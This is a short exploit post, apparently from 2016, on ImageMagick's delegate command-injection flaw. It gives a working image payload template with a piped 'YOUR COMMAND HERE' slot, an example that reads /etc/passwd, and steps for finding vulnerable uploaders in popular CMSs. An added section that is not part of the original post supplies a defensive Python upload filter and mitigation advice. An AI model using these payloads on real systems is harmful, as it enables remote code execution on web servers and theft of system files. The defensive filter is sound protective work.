[+]======================================================================[+]
[|]                        Exploiting ImageMagick                        [|]
[|]                            By @CrazedSec                             [|]
[+]======================================================================[+]
[|]                            What is it?                               [|]
[+]======================================================================[+]
[|]                                                                      [|]
[|] ImageMagick is a popular software used to convert, edit              [|]
[|] and manipulate images. It has libraries for all common               [|]
[|] programming languages, including PHP, Python, Ruby and               [|]
[|] many others. It is also very simple to use, which led it             [|]
[|] to be used by many developers when in need of image                  [|]
[|] cropping or manipulation.                                            [|]
[|]                                                                      [|]
[+]======================================================================[+]
[|]                            Vulnerability                             [|]
[+]======================================================================[+]
[|]                                                                      [|]
[|] ImageMagick doesn't properly filter the file names that              [|]
[|] get passed to the internal delegates that handle external            [|]
[|] protocols (e.g. HTTPS). This allows an attacker to execute           [|]
[|] commands remotely by uploading an image. This leads to a             [|]
[|] full RCE vulnerability in your image uploader.                       [|]
[|]                                                                      [|]
[+]======================================================================[+]
[|]                           Exploit Code                               [|]
[+]======================================================================[+]
[|] Should work for all image files (.jpg/.mvg/.svg/.png/etc.)           [|]
[|] Exploit Image contents:                                              [|]
[|]                                                                      [|]
[|] push graphic-context                                                 [|]
[|] viewbox 0 0 640 480                                                  [|]
[|] fill 'url(https://example.com/image.jpg "|YOUR COMMAND HERE")'       [|]
[|]                                                                      [|]
[|] Example Image:                                                       [|]
[|]                                                                      [|]
[|] push graphic-context                                                 [|]
[|] viewbox 0 0 640 480                                                  [|]
[|] fill 'url(https://example.com/image.jpg "|cat /etc/passwd")'         [|]
[|] pop graphic-context                                                  [|]
[|]                                                                      [|]
[|] More examples: https://ghostbin.com/paste/vd3u5                      [|]
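A defender-side check, added here as an example that is not part of the original post: a small Python upload filter that flags files whose bytes don't match their claimed extension and scans the file head for the MVG url() delegate-pipe pattern shown above, using the post's own example payload as a constructed test input. The magic-byte table, regex and function names are my own assumptions, not ImageMagick's.

```python
import re
from typing import Dict, List

# Magic bytes for raster formats the post names (table and function names are
# my own); an upload whose extension claims one but whose bytes disagree is
# worth a closer look, since ImageMagick sniffs content and ignores extension.
MAGIC: Dict[str, bytes] = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# MVG drawing primitives, which have no business in a photo upload.
MVG_MARKERS = (b"push graphic-context", b"viewbox", b"fill ")
# A quoted url() filename beginning with '|' is the delegate command-injection
# shape shown in the post.
DELEGATE_PIPE = re.compile(rb'url\s*\(\s*[^)]*"\s*\|', re.IGNORECASE)


def inspect_upload(filename: str, data: bytes) -> List[str]:
    """Return findings for one upload; an empty list means nothing flagged."""
    findings: List[str] = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    ext = {"jpeg": "jpg"}.get(ext, ext)
    magic = MAGIC.get(ext)
    if magic is not None and not data.startswith(magic):
        findings.append(f"extension .{ext} does not match file magic bytes")
    head = data[:4096]  # MVG payloads are tiny; the head is enough to decide
    if any(marker in head for marker in MVG_MARKERS):
        findings.append("MVG drawing primitives found in upload body")
    if DELEGATE_PIPE.search(head):
        findings.append("url() with piped filename: delegate command injection")
    return findings


# Constructed test inputs: a genuine PNG header, and the post's example payload
# renamed to .jpg as it would be submitted to an uploader.
SAMPLE_UPLOADS: Dict[str, bytes] = {
    "avatar.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    "avatar.jpg": (
        b"push graphic-context\n"
        b"viewbox 0 0 640 480\n"
        b"fill 'url(https://example.com/image.jpg \"|cat /etc/passwd\")'\n"
        b"pop graphic-context\n"
    ),
}


def scan_uploads(uploads: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Inspect every upload and keep only those with findings."""
    return {n: f for n, d in uploads.items() if (f := inspect_upload(n, d))}
```

Treat this as an extra layer only: the fix for the bug itself is upgrading ImageMagick or denying the affected coders (URL, HTTPS, MVG, MSL, EPHEMERAL) in its policy.xml.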
[+]======================================================================[+]
[|]                         How to Exploit                               [|]
[+]======================================================================[+]
[|]                                                                      [|]
[|]  1. Find an image uploader that uses ImageMagick to process images.  [|]
[|]  (Try it @ http://attack32.samsclass.info/im.htm)                    [|]
[|]  2. Craft a malicious image file                                     [|]
[|]  3. If it is running a vulnerable version, you'll have full RCE!     [|]
[|]                                                                      [|]
[|]  Sometimes popular CMSs such as vBulletin, myBB, and WordPress       [|]
[|]  implement ImageMagick to process user images!                       [|]
[|]                                                                      [|]
[|]                       Good luck exploiting!                          [|]
[|]                          [email protected]                           [|]
[+]======================================================================[+]


# siph0n [2016-05-13]